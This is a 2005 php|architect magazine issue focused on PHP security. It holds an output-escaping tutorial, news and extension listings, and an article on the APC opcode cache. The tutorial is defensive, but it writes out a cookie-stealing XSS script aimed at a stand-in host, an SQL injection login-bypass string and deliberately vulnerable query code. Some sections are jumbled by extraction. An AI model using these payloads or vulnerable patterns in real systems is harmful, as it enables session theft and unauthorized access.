
VOLUME 4 ISSUE 10

www.phparchitect.com

FOCUS ON SECURITY

PROTECT YOUR WORK FROM SQL INJECTION ATTACKS

Ilia Alshanetsky explains with this excerpt from

php|architect’s Guide to PHP Security

ESCAPE OUTPUT

Handling External Data

Is your work vulnerable to

HTTP RESPONSE SPLITTING?

THE CREATOR OF PHP RASMUS LERDORF

ON

OPTIMIZATION WITH

THE ALTERNATIVE

PHP CACHE


An introduction to PHP’s own opcode cache

Applying PHP to Publishing News

by RUBÉN MARTÍNEZ ÁVILA


Graphics & Layout

php|architect (ISSN 1709-7169) is published twelve times a year by Marco Tabini & Associates, Inc., P.O. Box 54526, 1771 Avenue Road, Toronto, ON M5M 4N5, Canada.

Although all possible care has been placed in assuring the accuracy of the contents of this magazine, including all associated source code, listings and figures, the publisher assumes no responsibilities with regards to use of the information contained herein or in all associated material.

php|architect, php|a, the php|architect logo, Marco Tabini & Associates, Inc. and the Mta Logo are trademarks of Marco Tabini & Associates, Inc.

Contact Information:

General mailbox: info@phparch.com

Editorial: editors@phparch.com

Subscriptions: subs@phparch.com

Sales & advertising: sales@phparch.com

Technical support: support@phparch.com

Reading the Table of Contents, flipping through the pages, or simply eyeballing the cover of this issue, you will probably notice a certain theme: security.

As I’m sure you’ve read in Security Corner over the past issues, the problems of poorly architected sites, security-ignorant code, and general carelessness when it comes to externally-supplied data are rampant in our community. Failure to abide by a few simple rules (never trust external data; filter input; escape output; etc.) has left much of the world wide web in a state of epidemic. The main culprits: remote code execution, SQL Injection and Cross Site Scripting (“XSS”).

I can almost hear some of you thinking “It can’t be THAT bad! How many times do you have to beat this dead horse?” and I wish you were correct. The reality of the situation is that XSS vulnerabilities (if not the other, more severe problems) can be found on all but a few elite sites (relatively speaking, from a pool of billions of web pages, of course).

Still don’t think it’s that bad? Then you should have been at php|works in Toronto, last month. Rasmus (more on him below) gave a keynote talk on PHP Security, and spent a good chunk of his time explaining the wide dispersion of XSS vulnerabilities. To illustrate his point (perfectly, I might add), he asked his audience to shout out the names of their favorite Canadian shopping sites, from which he chose a random site he’d never visited. Within 90 seconds, Rasmus had effectively demonstrated an XSS problem on the site. In fact, even the heavy-hitters are not immune: a friend showed me a simple XSS exploit for Google, as I was writing this editorial. Google!

This is the sort of stuff that keeps me awake at night, and one of the reasons we’re happy to bring you an issue that’s packed full of security-related content. We have the standard Security Corner, with an explanation of HTTP Response Splitting, and how you can avoid problems in this area. We’re also proud to be publishing a chapter from Ilia Alshanetsky’s recently-released book, php|architect’s Guide to PHP Security, which is even more packed full of security content. Ben continues his mini-series on security-related tips, focusing on escaping output, with which you can avoid the dreaded XSS problems on your sites.

Security aside (for a moment), we’re extremely excited to feature an article on APC, the Alternative PHP Cache, written by the creator of PHP himself, Rasmus Lerdorf. APC has been around for a while, but Rasmus (and his Yahoo! colleagues) have recently put a considerable amount of work into a largely-reworked major release of this extension. There’s finally a stable opcode cache for PHP 5, and from a source we can obviously trust, so we know it’s done right. A special “thanks” goes out to Rasmus for writing the piece.

FOCUS ON

SECURITY

EDITORIAL


PHP 5.0.5 RC1

php.net announces the release of PHP 5.0.5 RC1.

“This version is a maintenance release that contains numerous bug fixes, including security fixes to vulnerabilities found in the XMLRPC package. All users of PHP 5.0 are encouraged to upgrade to this version.”

Some of the changes in PHP 5.0.5:

• Changed ming to support official 0.2a and 0.3 library versions.
• Added PHP_INT_MAX and PHP_INT_SIZE as predefined constants.
• Fixed memory corruption in stristr().
• Many more changes included as well as several bug fixes.

Get your hands on the latest release at php.net!

MySQL 5.0 Release Candidate

MySQL announces:

“I’m proud and excited to announce the first Release Candidate of MySQL 5.0. This milestone signals that we are nearing what is certainly the most important release in MySQL’s history.

MySQL 5.0 has new functionality that I hope will be welcomed, adopted, and put to productive use by the community of MySQL users: you. On the commercial side, MySQL AB is getting a lot of good vibes from new enterprise customers who are beginning to understand the impact MySQL can have on their IT infrastructure and costs of running mission-critical applications.”

Some of the new ANSI SQL features include:

• Views (both read-only and updatable views)
• Stored Procedures and Stored Functions, using the SQL:2003 syntax, which is also used by IBM’s DB2

• Small bug-fixes in the chatAdvanced example: the error dialog was removed.
• najax.html.importForm (imports an associative array to the corresponding form elements) and najax.html.exportForm (exports form values to an associative array) were added.
• Support for asynchronous call canceling was added.

Check out the latest release at http://najax.sourceforge.net/dev/

PHPsh 1.0.1

According to the psychogenic homepage, PHPsh provides “Simple, web-based shell access to your server.”

“It can be very annoying when you are restricted to FTP access: how can you find out the full path to a directory, or perform a command line SQL dump when you’re trapped in the limited, chrooted environment provided by an FTP server? PHPsh (PHP shell) allows you to have shell commands run on your behalf by any webserver which serves PHP pages. It solves these issues and more, allowing you to tap into the power of any Unix (Linux, BSD, etc.) server!

PHPsh was designed to allow developers, webmasters and sysadmins a quick and easy remedy to those situations in which it would be so easy to solve a problem or answer a question with shell access but a pointy-haired hosting company thinks shell access is only useful for crackers while simultaneously allowing anyone with FTP access the right to run arbitrary commands through CGI or PHP (doh!).”

http://www.psychogenic.com/en/products/PHPsh.php

php|architect Releases New Design Patterns Book

We’re proud to announce the release of php|architect’s Guide to PHP Design Patterns, the latest release in our Nanobook series.

You have probably heard a lot about Design Patterns, a technique that helps you design rock-solid solutions to practical problems that programmers everywhere encounter in their day-to-day work. Even though there has been a lot of buzz, however, no-one has yet come up with a comprehensive resource on design patterns for PHP developers. Until today.

Author Jason E. Sweat’s book php|architect’s Guide to PHP Design Patterns is the first comprehensive guide to design patterns designed specifically for the PHP developer. This book includes coverage of 16 design patterns with a specific eye to their applications in PHP when building complex web applications, both in PHP 4 and PHP 5 (where appropriate, sample code for both versions of the language is provided).

For more information, visit http://www.phparch.com/shop_product.php?itemid=96.


Looking for a new PHP Extension? Check out some of the latest offerings from PECL.

expect 0.1

This extension allows you to interact with processes through PTYs, using the expect library.

runkit 0.6

Replace, rename, and remove user defined functions and classes. Define customized superglobal variables for general purpose use. Execute code in restricted environment (sandboxing).

pecl_http 0.14.1

• Building absolute URIs
• RFC compliant HTTP redirects
• RFC compliant HTTP date handling
• Parsing of HTTP headers and messages
• Caching by “Last-Modified” and/or ETag (with ‘on the fly’ option for ETag generation from buffered output)
• Support for sending data/files/streams with (multiple) ranges
• Negotiating user preferred language/

Xdebug 2.0.0beta4

The Xdebug extension helps you debug your scripts by providing valuable debug information, including the following:

• stack and function traces in error messages with:
  • full parameter display for user defined functions
  • function name, file name and line indications
  • support for member functions
• memory allocation
• protection for infinite recursions

Xdebug also provides:

• profiling information for PHP scripts
• script execution analysis
• capabilities to debug your scripts interactively with a debug client

Check out some of the hottest new releases from PEAR.

Validate_BE 0.1.1

Package contains locale validation for Belgium such as:

• Postal Code
• Bank Account Number
• Structured Bank Transfer message (National transfer from one bank account to another)
• VAT
• National ID
• Identity Card Number (not ready)
• SIS CARD ID (Belgian “sécurité sociale” ID)

HTML_Progress2 2.0.0

This package provides a way to add a fully customizable loading bar into existing XHTML documents. Your browser should be DHTML-compatible.

Features:

• create bar (horizontal, vertical), circle, ellipse and polygon (square, rectangle) progress meters
• allows usage of existing external StyleSheet and/or JavaScript
• all elements’ (progress, cells, labels) HTML properties are customizable
• percentage/labels can be placed around the progress meter
• compliant with CSS/XHTML standards
• integration with template engines is very easy
• implements the Observer design pattern: it is possible to add Listeners
• adds a customizable monitor pattern to display a progress bar; end-user can abort progress at any time
• allows many progress meters on the same page without the use of iframes
• error handling system that supports native PEAR_Error, but also PEAR_ErrorStack, and any other system you might want to plug in
• PHP 5 ready

Image_Graph 0.7.0

Image_Graph provides a set of classes that create graphs/plots/charts based on (numerical) data. Many different plot types are supported: Bar, line, area, step, impulse, scatter, radar, pie, map, candlestick, band, box & whisker and smoothed line, area and radar plots. Graphs are highly customizable, making it possible to get the exact look and feel that is required.

The output is controlled by an Image_Canvas, which facilitates easy delivery to many different output formats: GD (PNG, JPEG, GIF, WBMP), PDF (using PDFLib), Scalable Vector Graphics (SVG), and others.

Image_Graph is compatible with both PHP 4 and PHP 5.

Image_Canvas 0.2.2

A package providing a common interface to image drawing, making image rendering library-independent.

Services_Yahoo 0.1.1

Services_Yahoo provides object-oriented interfaces to the web service capabilities of Yahoo!

HTML_AJAX 0.2.1

Provides PHP and JavaScript libraries for performing AJAX (Communication from JavaScript to your server without reloading the page).

Tips & Tricks

ESCAPE OUTPUT

by BEN RAMSEY

Filter Input. Escape Output. You’re hearing an awful lot of this from me lately, and as one person noted, “It’s great that they’re rubbing this topic in.” Indeed. This month’s Tips & Tricks wraps up the recent focus on security with a discussion on escaping output, why it’s important, and how to do it.

CODE DIRECTORY: escape

TO DISCUSS THIS ARTICLE VISIT:

In the previous three Tips & Tricks columns, I’ve taken time to fully explain why all input should be filtered, and I’ve offered tips on how to filter your data so that the data you work with and save isn’t considered tainted. However, security-conscious programming doesn’t end with filtering data. Sure, now the data conforms to expectations, but it may still contain characters that have special meaning depending on the medium in which your application chooses to display it. That medium may be HTML, SQL, XML, WML, etc.

Thus, we must escape output.

What is output? Output is any data that leaves your application bound for another client or application. The receiving client or application expects the data to be of a specific format (HTML, SQL, etc.), and that format may include characters or other information with special meaning to the receiving client/application. The data being sent, however, might (and probably does) contain special characters that should not be interpreted with any special meaning by the receiving client, so we need to escape them.

Escaping is also sometimes referred to as encoding. In short, it is the process of representing data in a way that it will not be executed or interpreted. For example, HTML will render the following text in a Web browser as bold-faced text because the tags have special meaning:

<b>This is bold text.</b>

But, suppose I want to render the tags in the browser and avoid their interpretation. Then, I need to escape the angle brackets, which have special meaning in HTML. The following illustrates the escaped HTML:

&lt;b&gt;This is bold text.&lt;/b&gt;

Why Escape?

So, you run a Web-based forum, and you don’t have a problem with users entering the occasional HTML tag. Why should you escape your output?

Here’s why: Suppose this forum allows users to enter HTML tags. That’s fair enough (you may want to allow them to enter bold-faced or italicized text), but then it outputs everything in its raw form. Everything. So, all HTML tags get interpreted by the web browser. What if a user enters a script that sends the browser to another site?

Any subsequent user who is logged into the forum and visits this page will now be redirected to http://evil-example.org/steal-cookies.php and any cookies set by the forum can be stolen.
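To make the risk concrete, here is a minimal sketch. The post content and variable names are hypothetical, chosen only for illustration; htmlentities() is PHP's built-in function.

```php
<?php
// Hypothetical forum post from a malicious user (an assumption for illustration).
$post = '<script>document.location = "http://evil-example.org/steal-cookies.php?c=" + document.cookie;</script>';

// Sent to the browser as-is, the script element would be executed.
$raw = $post;

// Escaped for HTML, the same data is displayed as text instead of being run.
$escaped = htmlentities($post, ENT_QUOTES, 'UTF-8');

echo $escaped, "\n";
```

The escaped string no longer contains an angle bracket, so the browser has nothing to interpret as markup.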

Let’s look at another example. Many sites contain login forms, which usually consist of two fields: a username and a password. When a user enters a username and password, the application may enter the values into an SQL statement, as in the following:

$sql = "SELECT * FROM users
        WHERE username = '{$_POST['username']}'
        AND password = '{$_POST['password']}'";

This statement will work just fine as long as a user enters a proper username and password, but suppose a user enters something like "example' OR 1 = 1; --" as the username? The value of 1 will always equal 1, and since the user properly closed the single quote in the statement, the OR clause will be treated as part of the SQL, and everything after the -- will be ignored (at least in most database engines) as a comment. Thus, the user is able to log in without an account.
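The effect is easiest to see by printing the statement that would be sent to the database. This is a small sketch in which a plain array stands in for $_POST; the array and its values are assumptions for illustration.

```php
<?php
// Hypothetical request data standing in for $_POST (an assumption for illustration).
$post = array(
    'username' => "example' OR 1 = 1; --",
    'password' => 'anything',
);

// The vulnerable pattern from the text: values interpolated without escaping.
$sql = "SELECT * FROM users
        WHERE username = '{$post['username']}'
        AND password = '{$post['password']}'";

echo $sql, "\n";
```

In the printed statement, the quote supplied by the user closes the username literal early, and the rest of the input is read as SQL rather than as data.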

The first step to ensure situations such as these do not occur is to filter all input to ensure that no unexpected characters appear in the data. See the July 2005 through September 2005 issues of php|architect for my full discussion on input filtering.

After filtering, be sure to save the raw data. Do not escape it before storing.

If escaped before storing, then it might be necessary to unescape it at some point in the future. For example, what if the data is escaped for HTML output and stored to a database table only to be retrieved later to output in XML or to PDF, etc.? Then, it must be unescaped to transport to those formats, and possibly escaped again to accommodate the new output medium. This process is bound to introduce more bugs to your code and could likely reduce the quality of the data. Thus, to make the most of your data, it is best to save it raw (after filtering) and escape only when outputting.

Escaping output is not a terribly difficult process. At the least, it may require the addition of a few extra lines of code, or it may require a little more attention to detail. The important thing to keep in mind is the format outputted and the special characters that need to be escaped for that format. For the purposes of this discussion, I will cover escaping for HTML and SQL, since PHP has excellent built-in functions for handling output
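The advice to store data raw and escape only at output time can be sketched as follows. The sample value and variable names are hypothetical; htmlspecialchars() and its ENT_XML1 flag are built into PHP (the flag since PHP 5.4, which is later than the versions this article targets).

```php
<?php
// Hypothetical value that has already been filtered and was stored raw.
$raw = "O'Reilly & Sons <info@example.org>";

// Escape at output time, once per destination format.
$forHtml = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
$forXml  = htmlspecialchars($raw, ENT_QUOTES | ENT_XML1, 'UTF-8');

echo "<p>{$forHtml}</p>\n";
echo "<name>{$forXml}</name>\n";

// $raw itself is untouched and can still serve any future output format.
```

Because the stored value is never modified, adding another output medium later needs only one more escaping call, with no unescaping step.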

Data may leave your application

in many forms.


that attempt to do something similar by removing all but a set of allowed tags, but these are not without their flaws and can potentially introduce some nasty bugs that are too lenient when outputting data. Likewise, strip_tags() offers the option to allow certain tags with the format strip_tags($str, '<a>');, but this is also too lenient: attributes are not stripped from allowed tags, allowing onclick events, etc. to persist in output. Take the following code snippet, for example:

echo strip_tags($str, '<a>');

This code will output the following, complete with the cross-site scripting (XSS) in the onclick attribute:

Bold text
<a href="#" onclick="alert('XSS');">Link</a>
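A self-contained version of this behaviour is sketched below. The value of $str is an assumption, since its definition is not reproduced in the text above.

```php
<?php
// Hypothetical input; the article's own definition of $str is not shown here.
$str = '<b>Bold text</b> <a href="#" onclick="alert(\'XSS\');">Link</a>';

// Only <a> is allowed, but its attributes pass through untouched.
$out = strip_tags($str, '<a>');

echo $out, "\n";
```

The bold tags are removed, while the link keeps its onclick handler, which is exactly the leniency described above.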

Rather than completely stripping the tags from output, a better alternative may be to escape all the tags, allowing them to render in the output. This is an easy task with htmlspecialchars() and htmlentities(). Both of these functions serve the same purpose: to convert special characters into their equivalent HTML entities. The main difference is that htmlentities() is more exhaustive, choosing to convert all characters with HTML character entity equivalents to their respective HTML entities. Thus, for its exhaustive nature, I will recommend htmlentities() as the better function to use to escape HTML output. For the above $str example, htmlentities() returns the following:

In this case, however, allowing the <b> tags may be preferable, and so we can allow them by first escaping the output and then converting the selected HTML entities back to HTML with str_replace():

$str = htmlentities($str);
$str = str_replace('&lt;b&gt;', '<b>', $str);
$str = str_replace('&lt;/b&gt;', '</b>', $str);

This will ensure that we send only those special characters that we desire to have interpreted to the client. While this is a form of unescaping, which I mentioned earlier is not a desirable process, it is nevertheless a good alternative to using strip_tags() to allow certain tags, as it will ensure that any tags that contain undesirable attributes are not interpreted by the client.

In addition, there is no guesswork involved here; I am not using a regular expression that I could potentially get wrong and, thus, introduce a hole in my application. I will always know what a tag looks like after the angle brackets have been converted to their HTML entity equivalents, so it is easy for me to find and convert the tags back to HTML.
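The escape-then-restore approach can be wrapped in a small helper. This is a sketch under assumptions: the function name, the sample input, and the choice of bold as the single allowed tag are illustrative only.

```php
<?php
// Escape everything, then restore only an explicit list of harmless tags.
// The function name and the choice of <b> are assumptions for illustration.
function escape_allowing_bold($str)
{
    $str = htmlentities($str, ENT_QUOTES, 'UTF-8');

    // Exact string matches only: a tag carrying attributes stays escaped.
    return str_replace(
        array('&lt;b&gt;', '&lt;/b&gt;'),
        array('<b>', '</b>'),
        $str
    );
}

$str = '<b>Bold text</b> <a href="#" onclick="alert(\'XSS\');">Link</a>';
echo escape_allowing_bold($str), "\n";
```

Since the replacement looks for the exact escaped form of a bare tag, an opening bold tag that carries an attribute never matches and therefore remains inert text.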

Escaping SQL

Similarly, PHP offers excellent built-in functions for escaping SQL statements according to the database engine used. For PostgreSQL, there is pg_escape_string(); for MySQL, mysql_real_escape_string(); and for SQLite, sqlite_escape_string(). If the other native database functions provided in PHP do not offer a similar function, then PHP offers addslashes(), though I would advise that the database’s native escape string function is always a better alternative than addslashes().

Using the SQL example from earlier, we can escape it using mysql_real_escape_string(), as shown in Listing 1, where we first filter it using the filter() function I gave in the August 2005 issue. Thus, if a user enters the value "example' OR 1 = 1; --" as a username, the SQL that is executed will be:

SELECT * FROM users WHERE username = 'example\' OR 1 = 1; --'
AND password = 'password'

The single quotation mark is escaped and no results are returned because this user doesn’t exist. The user can’t gain access to the application.

Some database functions, such as the unified ODBC functions, mysqli, and PDO (in PHP 5.1), use the concept of prepared statements to prepare and properly escape an SQL statement. Listing 2 illustrates a prepared statements example using PDO. The SQL statement that is created will appear much like the one listed above, but PDO offers added functionality through the optional bindParam() parameters to define the type and length of data.

Prepared statements also exist in PEAR::DB and other database abstraction classes, but PDO offers much promise since it is built into the language and, thus, much faster with less overhead.

So, if possible, use prepared statements (with PDO, if possible). If they aren’t available, use the database’s built-in escaping function. If that isn’t available, then fall back on addslashes() as a last resort.
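As a rough illustration of the prepared-statement approach, the sketch below runs against an in-memory SQLite database. It assumes the pdo_sqlite driver is installed; the function name, table layout and sample rows are hypothetical, and the plain-text password column only mirrors the article's example.

```php
<?php
// Sketch only: assumes the pdo_sqlite driver is available; table and column
// names are hypothetical. Plain-text passwords mirror the article's example.
function find_user(PDO $db, $username, $password)
{
    $stmt = $db->prepare(
        'SELECT username FROM users
         WHERE username = :username AND password = :password'
    );
    // Values travel separately from the SQL text, so quotes cannot alter it.
    $stmt->bindParam(':username', $username, PDO::PARAM_STR);
    $stmt->bindParam(':password', $password, PDO::PARAM_STR);
    $stmt->execute();

    return $stmt->fetchColumn(); // false when no row matches
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES ('example', 'secret')");

var_dump(find_user($db, 'example', 'secret'));
var_dump(find_user($db, "example' OR 1 = 1; --", 'x'));
```

The injection attempt is simply compared as a literal username, so it matches no row.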


A Security-Conscious Mindset

The key to secure programming is having a security-conscious mindset. Filtering input and escaping output is just part of that mindset, but it takes more thought than simply copying code from elsewhere to introduce security to an application. It takes careful planning and diligent testing.

By now, I hope that you are well on your way to being a security-conscious programmer. I have introduced some tools and concepts to help you get started, and it is likely that you have thought of code you’ve already written and how to improve it using these principles.

So, have fun, good luck, and be sure to keep security at the forefront of a project. Security is not a design feature; it is an essential tool.

For future installments of Tips & Tricks, I would like to know what tips and tricks you are using. Please send your tip and/or trick to tnt@benramsey.com, and, if I use it, you’ll receive a free digital subscription to php|architect.

Listing 1

<?php

$clean = filter($_POST, $post_whitelist);

$username = mysql_real_escape_string($clean['username']);
$password = mysql_real_escape_string($clean['password']);

$sql = "SELECT * FROM users
        WHERE username = '{$username}'
        AND password = '{$password}'";

Listing 2

…
$sql = 'SELECT * FROM users
        WHERE username = :username
        AND password = :password';

BEN RAMSEY is a Technology Manager for Hands On Network in Atlanta, Georgia. He is an author, Principal member of the PHP Security Consortium, and Zend Certified Engineer. Ben lives just north of Atlanta with his wife Liz and dog Ashley. You may contact him at ramsey@php.net or read his blog at http://benramsey.com/.

An opcode cache works by intercepting the compile and execute hooks in the Zend engine and then storing the result of the compilation phase in a shared memory cache.

On subsequent requests to the same file, a check is done to see if the opcodes corresponding to the script are in the cache. There is also a check to determine if the file on disk has a modification time that is newer than the timestamp on the opcodes in the cache.
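The two checks can be modelled in a few lines of PHP. This is purely a conceptual sketch: a real opcode cache does this in C inside the Zend engine with shared memory, and the array, the function names and the stand-in compile step here are all assumptions.

```php
<?php
// Conceptual model only; not how APC is implemented. All names are hypothetical.
$cache = array();

function fake_compile($file)
{
    return 'opcodes for ' . $file;
}

function load_opcodes(array &$cache, $file)
{
    clearstatcache();
    $mtime = filemtime($file);

    // Hit: an entry exists and the file on disk is not newer than the entry.
    if (isset($cache[$file]) && $cache[$file]['mtime'] >= $mtime) {
        return array('hit', $cache[$file]['opcodes']);
    }

    // Miss or stale entry: compile and store the result.
    $cache[$file] = array('mtime' => $mtime, 'opcodes' => fake_compile($file));
    return array('miss', $cache[$file]['opcodes']);
}

$file = tempnam(sys_get_temp_dir(), 'apc');
file_put_contents($file, '<?php echo 1;');

list($first)  = load_opcodes($cache, $file);
list($second) = load_opcodes($cache, $file);

touch($file, time() + 10);            // simulate a later modification
list($third)  = load_opcodes($cache, $file);

unlink($file);
echo "$first, $second, $third\n";
```

The first request compiles, the second is served from the cache, and the third recompiles because the file's modification time moved past the cached timestamp.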

There are a number of opcode caches available for PHP. They are sometimes referred to as compilers or accelerators, but I find the term “opcode cache” to be the most accurate and descriptive term for what they do. Similar packages to APC that are available are ionCube PHP Accelerator, eAccelerator and Zend Cache. Your choice of cache, I will leave up to you, but at the time of this writing only APC and Zend Cache had full PHP 5.1 support and of those two only APC is open source and available in PECL.

Installing APC

There are a number of things you can configure when you build APC, but you still may be able to install it with a simple “pear install apc” command (an example install session can be seen in Listing 1).

I tend to prefer poking around in any PECL extensions I want to use before I install them, so I install extensions by checking them out from CVS, and compiling using the normal phpize + ./configure + make + make install

Alternative PHP Cache

Adding an opcode cache to your PHP configuration is the easiest way to speed up your PHP applications without changing a single line of your code.

http://forum.phparch.com/258

ABOUT THE AUTHOR: RASMUS LERDORF is known for having gotten the PHP project off the ground in 1995, for the mod_info Apache module, and he can be blamed for the ANSI92 SQL-defying LIMIT clause in mSQL 1.x which has now, at least conceptually, crept into both MySQL and PostgreSQL. Prior to joining Yahoo! as an infrastructure engineer in 2002, he was at a string of companies including Linuxcare, IBM, and Bell Canada working on Internet technologies.

Common Configuration Options

The APC configuration directives that I normally place in my php.ini file can be seen in Listing 3.

This setup gives me a 64M single file-backed memory-mapped segment, geared for a server with 500 cacheable files. I’ve turned opcode optimization off, because the APC optimizer is quite unhappy at the moment, and set a relatively low opcode cache time-to-live (ttl) of 30 minutes with a higher user cache ttl of 2 hours.

These TTL values are only used in case we start to hit the top of our 64 megabyte segment. If we run out of memory space, APC scans the cache for opcode and user cache entries that haven’t been accessed for the number of seconds denoted in the ttl configuration directive, and removes them. The 500 files hint is just that: a hint. You can easily cache more files than the number you’ve declared, but it is there to help optimize the hashing algorithm. There is no point in having a hashtable that contains 10,000 slots, each using a little bit of memory, if you are never going to have more than 25 files in it. An apc.num_files_hint of 500 actually ends up creating a hash table with 1000 slots. If two files hash to the same slot the second file gets linked to the first. As entries hash to the same slots, the longer this linked list of entries becomes, and to fetch these entries, APC has to walk these linked lists sequentially. Therefore having too few hash slots is also a bad thing. The one slight advantage of having many collisions is that APC does some very lazy garbage collection as it walks the linked lists, but this behavior doesn’t outweigh the drawbacks.
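The cost of an undersized hint can be illustrated with a toy chained hash table. This is a conceptual model rather than APC's C implementation: the use of crc32() as the hash function, the file names and the function names are assumptions, while the slot count of twice the hint follows the text.

```php
<?php
// Conceptual model of a chained hash table; not APC's actual code.
// crc32() as the hash function is an assumption for illustration.
function build_table(array $files, $numFilesHint)
{
    $slots = $numFilesHint * 2;   // a hint of 500 yields 1000 slots
    $table = array();

    foreach ($files as $file) {
        $slot = crc32($file) % $slots;
        // Colliding entries are appended to the chain for that slot.
        $table[$slot][] = $file;
    }
    return $table;
}

function longest_chain(array $table)
{
    return $table ? max(array_map('count', $table)) : 0;
}

$files = array();
for ($i = 0; $i < 2000; $i++) {
    $files[] = "/var/www/app/file{$i}.php";
}

// Far too small a hint forces long chains that must be walked on each fetch.
echo longest_chain(build_table($files, 5)), "\n";
echo longest_chain(build_table($files, 500)), "\n";
```

With 2000 files squeezed into 10 slots, at least one chain must hold 200 or more entries; with 1000 slots the chains stay short.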

The apc.mmap_file_mask configuration parameter is tricky. Generally, you would just always use an mkstemp mask as I have shown in Listing 3. It is file-backed, but the file is unlinked right after the mmap call, which ensures that the shared memory segment will automatically be cleaned up (removed) when the APC (or APC-hosting) process exits. If, for some reason, you want to force a real anonymous mmap, you can leave it empty. You can specify /dev/zero to mmap from there, if your OS prefers that, or if you use something like /apc.shm.XXXXXX it will use shm_open() instead. On Linux, that path has to be in the root directory, and you must have shmfs enabled (either compiled into the kernel, or loaded as a module).
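One way to confirm that a server is running with the settings described in this section is to compare them against ini_get(). The values below are reconstructed from the prose, not copied from Listing 3, so treat each one as an assumption; the mask path in particular is only a typical mkstemp-style example.

```php
<?php
// Values inferred from the description in the text; every value (especially
// the mask path) is an assumption. ini_get() returns false when a directive
// is unknown, for example when the APC extension is not loaded.
$expected = array(
    'apc.shm_segments'   => '1',                     // a single segment
    'apc.shm_size'       => '64',                    // 64M
    'apc.num_files_hint' => '500',
    'apc.optimization'   => '0',                     // optimizer off
    'apc.ttl'            => (string) (30 * 60),      // 30 minutes
    'apc.user_ttl'       => (string) (2 * 60 * 60),  // 2 hours
    'apc.mmap_file_mask' => '/tmp/apc.XXXXXX',       // hypothetical mkstemp mask
);

foreach ($expected as $directive => $value) {
    $actual = ini_get($directive);
    printf(
        "%-20s expected %-16s actual %s\n",
        $directive,
        $value,
        $actual === false ? '(not set)' : $actual
    );
}
```

On a machine without APC every line reports "(not set)", which is itself a quick way to tell that the extension did not load.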

You can also prevent APC from caching certain files by using the apc.filters configuration directive. You provide either a single regular expression, or a comma-separated list of regexes that match the full-path filenames you want to exclude from being cached. The main reason you might want to do this is in a scenario where you have files that change extremely rapidly; by this, I mean every second or two. Another circumstance where excluding certain files from the cache might be beneficial is when your system consists of literally hundreds of thousands of files, and you want to force APC to focus on the performance-critical ones and not have the little-used files potentially causing your cache to fill up, which slows down garbage

Listing 1

10:36pm ubuntu:~> pear install apc
…
Zend Module Api No: 20050617
Zend Extension Api No: 220050617
Use mmap instead of shmget (usually a good idea) [yes] :
Use apxs to set compile flags (if using APC with Apache)?
…
install ok: APC 3.0.6

Listing 2

…
Zend Module Api No: 20050617
Zend Extension Api No: 220050617
$ ./configure --enable-apc-mmap \
    --with-php-config=/usr/local/php5/bin/php-config \
    --with-apxs
…
configure: creating ./config.status
config.status: creating config.h
10:45pm ubuntu:/tmp/pecl/apc> make
10:47pm ubuntu:/tmp/pecl/apc> make install
Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20050617/

The APC Info Page

In the pecl/apc directory, you will find a script called apc.php (Figure 1). This file, when executed, gives you a nice overview of what is in your cache, and how much of your shared memory segment is being used. It would probably be a good idea to put this script behind htaccess authentication, if you are going to put it in a web-accessible directory, but it also has its own built-in auth system. Read the first section of the code in apc.php itself for more information.

Uniquely Identifying Files

A file, whether it is the initial script file or an included file, is identified by its device and inode (the file’s unique position identifier within the filesystem), not its filename.

This method is used so files can be uniquely identified in a single stat() call. If we were to try to differentiate files by their filename, we would need the fully qualified pathname and that can be extremely expensive to get, since it would involve calling realpath() which, in turn, calls stat() for every component of the path in order to resolve any symbolic links that it might discover. By using the file’s inode, we get it down to a single stat call per file. When PHP and APC are nested within an Apache process, there is no additional stat(), since Apache will have already made this call, and APC inherits the stat structure directly from Apache. This means that, for PHP scripts that don’t include anything, APC eliminates all disk-touching system calls after Apache has handed the request over to PHP. This additional optimization makes for speedy caching.
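The idea of keying on device and inode can be tried from PHP itself with stat(). The key format and the function name below are assumptions for illustration; APC performs the equivalent lookup in C.

```php
<?php
// Illustration of identifying a file by device and inode rather than by name.
// The key format is an assumption; APC's real implementation is in C.
function file_key($path)
{
    $st = stat($path);               // one stat() call yields both numbers
    return $st['dev'] . ':' . $st['ino'];
}

$file  = tempnam(sys_get_temp_dir(), 'apc');
$alias = dirname($file) . '/./' . basename($file); // different name, same file

$same = file_key($file) === file_key($alias);
unlink($file);

var_dump($same);
```

Two different spellings of the path produce the same key without any path normalization, which is the saving the text describes.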

Updating Files on a Live Web Server

People tend to not pay enough attention to how they update files on their web server.

This is a problem, regardless of the presence of an opcode cache. If you fire up your favourite text editor and edit a PHP script on your live web server, not only is there a good chance that you will break your actual code on the first try, but more importantly, your editor probably does not write the file to the filesystem atomically when you are done. That means that requests for the file you are saving may end up getting a partially written file. File writes tend to be pretty fast, so even on a busy server this should only affect a few requests. However, if you throw an opcode cache into the mix, you could end up caching this partially written file, so all subsequent requests will get the same partial set of opcodes from the cache.

In order to reduce the impact of this scenario, APC has an option called file_update_protection. This feature is enabled and set to 2 seconds by default, meaning that files that have been modified within 2 seconds of the request will not be cached. This should prevent any partially written files from polluting the cache.

Employing this feature, however, doesn’t fix the real problem: non-atomic file modification on a live web server. The correct way to address this issue is to only replace files atomically, by writing to a temp file and then renaming the file to its intended destination filename, or by using automated tools such as rsync that correctly handle the details of this maneuver for you. UNIX commands and applications such as cp, tar, vi and emacs often do not create files atomically.
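The write-to-a-temp-file-then-rename approach can be sketched in a few lines of PHP. The function name atomic_write() and the 0644 permission are assumptions made for this example; the key point is that the temporary file lives in the destination directory, so rename() never crosses a filesystem boundary.

```php
<?php
// Sketch only: atomic_write() is a hypothetical helper name.
function atomic_write($dest, $contents) {
    // Create the temp file next to the destination so rename()
    // stays on one filesystem and replaces the target in one step.
    $tmp = tempnam(dirname($dest), '.tmp');
    if ($tmp === false) {
        return false;
    }
    if (file_put_contents($tmp, $contents) === false) {
        unlink($tmp);
        return false;
    }
    chmod($tmp, 0644);              // tempnam() creates the file as 0600
    if (!rename($tmp, $dest)) {
        unlink($tmp);
        return false;
    }
    return true;
}
```

Readers of the destination path see either the old file or the complete new one, never a half-written version.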

Cache Slams

Another often-overlooked issue occurs when files on a very busy server are changed.

